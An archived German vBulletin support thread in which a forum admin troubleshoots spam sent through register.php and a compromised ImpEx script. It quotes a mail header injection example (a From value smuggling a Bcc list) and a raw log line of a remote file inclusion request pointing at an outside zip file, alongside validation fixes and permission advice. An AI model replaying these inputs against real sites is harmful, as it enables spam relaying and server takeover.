PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Problem]: Spammails über ../forum/register.php POST /forum/register.php?do=addmember

Thion
13.08.2007, 15:34
Hallo Support,

ich habe heute von meinem provider eine mail bekommen, in dem man mir folgendes mitgeteilt hat:

wie ich soeben bei Wartungsarbeiten am Server festgestellt habe versenden Sie in massen Mails mittels eines php Scripts.
Ich möchte Sie darauf aufmerksam machen das wir dies nicht dulden (siehe AGB's) und würde Sie bitten dies zu unterlassen.

Das betroffene Script ist .../forum/register.php POST /forum/register.php?do=addmember

Da wir davon ausgehen das dies nicht von Ihnen gewollt ist, haben wir das Script vorläufig per .htaccess in Ihrem Startverzeichnis, für den Aufruf über Webbrowser abgeschaltet.

Bitte prüfen Sie daher Ihre Scripte da diese meist durch eine Sicherheitslücke zum spammen missbraucht werden. In diesem Fall sollten Sie auf diese Scripte verzichten oder aber auf eine aktuellere (sicherere) Version updaten.

Mögliche Ursachen sind:

Häufig wird durch Spammer versucht unsichere Formmail Scripte für Spam E-Mails zu missbrauchen.
So haben viele Scripte zwar alle ein festes "mail to" hinterlegt, allerdings
wurden die zu bespammenden Adressen nicht als "Mail to" eingetragen, sondern als "BCC".

Dies funktioniert, wenn man im "From" z.B. folgendes einträgt:

kunde@domain.de
Bcc: test1@spamopfer.de, test2@spamopfer.de, [... bis 2045 Zeichen]

Das Zeichen
dient hier als Zeilenumbruch der es ermöglicht weitere Optionen an die Mail anzufügen.

Um diesem Missbrauch vorzubeugen ist es notwenig daß man folgende Zeilen in das Formmail Script einfügt:

für Perl
chomp $input;
die "ungültiges mailformat" unless ($input =~ m/^[a-zA-Z_-.0-9]+@[a-zA-Z_-.0-9]+$/);

Ersetzten Sie die Variable $input durch die Variable, die in Ihrem Script die Mailadresse des Absenders enthält und fügen Sie
die veränderte Zeile im Script vor dem Mailversand ein. Damit wird ein einfacher Test auf die Mailadresse angewandt,
der den Missbrauch des Scriptes verhindert.

für php

if(!preg_match( '/^([a-zA-Z0-9])+([.a-zA-Z0-9_-])*@([a-zA-Z0-9_-])+(.[a-zA-Z0-9_-]+)+$/' , $input)) die("ungültiges mailformat");

errrm .... wie ist das möglich und wie kann ich das beheben?

Kann mir damit jemand helfen?

Boothby
13.08.2007, 16:08
Da das ein schwerwiegenderes Problem ist, solltest du ein Supportticket (http://members.vbulletin-germany.com/membersupport_contactform.php) eröffnen.

pogo
13.08.2007, 16:55
Kannst du dir bitte von deinem Hoster genaue Logs geben lassen, an denen man auch erkennen kann, welche Skript-Aufrufe getätigt wurden?

Thion
13.08.2007, 17:29
Ich telefoniere morgen mit dem zuständigen Sachbearbeiter ... dann frag ich ihn wegen der logs

Thion
14.08.2007, 09:04
Neue version, Neue Mail ... neue Sicherheitslücke:
hier der Aufruf:

www.xyz.de***212.241.210.198 - - [13/Aug/2007:11:37:28 +0200] "POST /forum/impex/ImpExData.php?systempath=http://cropscircles.org/natwest2.zip? HTTP/1.1" 200 993106 "http://www.xyz.de/forum/impex/ImpExData.php?systempath=http://cropscircles.org/natwest2.zip?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"

Hoffi
14.08.2007, 09:14
Das sieht fast nach der bekannten Lücke aus. ImpEx sollte man nach dem Gebrauch direkt wieder löschen.

Thion
14.08.2007, 09:20
Ok habs ausgeklammert ... was ist mit dem zugriff auf die register.php ... Leider hab ich noch keine logs vorliegen hierzu ...

Oder mal ne andere Frage ... wie müssen die Verzeichnis/File rechte aussehen bei einer vBulletin innstallation ... welche Files müssen schreibrechte haben ... und kann man die restlichen Files / Verzeichnisse auf 0755 setzen? ... finde leider keine Auflistung in den FAQs. Vielleicht hab ich hier ja was falsch

Hoffi
14.08.2007, 09:32
Bei einer Standardinstallation braucht keine Datei oder Verzeichnis schreibrechte.
Dies muss nur für folgende Dinge geändert werden:

Auslagerung der Styles: Schreibrechte in /clientscript/vbulletin_css
Auslagerung der Avatare: Schreibrechte in customavatars
Selbes gilt für anhänge und den Speicherordner.

Dies kann sich bai Hacks natürlich weiter fortsetzen.

h75
14.08.2007, 09:34
Wenn du CSS auslagerst, dann nur der Ordner /clientscript/vbulletin-css/
Ansonsten braucht kein Ordner Schreibrechte.

Bis auf Signaturen, User-Pics, Smilies usw die man ja auch auf dem Server ablegen kann. Wenn du das aber nicht nutzt, brauchen diese Ordner auch keine Schreibrechte.

Wenn du vB normal entpackst und installierst, haben 0 Ordner Schreibrechte. ;)

Hoffi
14.08.2007, 10:07
Diesmal war ich schneller. *fg* SCNR

pogo
14.08.2007, 11:48
Nur noch mal zur Sicherheit:

Dieser Fehler in Impex wurde vor über einem Jahr bereits behoben (April 2006). Sollte dein ImpEx-Download länger zurückliegen, bist du natürlich betroffen, falls du ImpEx nicht gelöscht hast.

Wir haben übrigens in einem eBulletin vom 7.April 2006 (http://www.vbulletin-germany.com/forum/showthread.php?t=23303) darauf hingewiesen.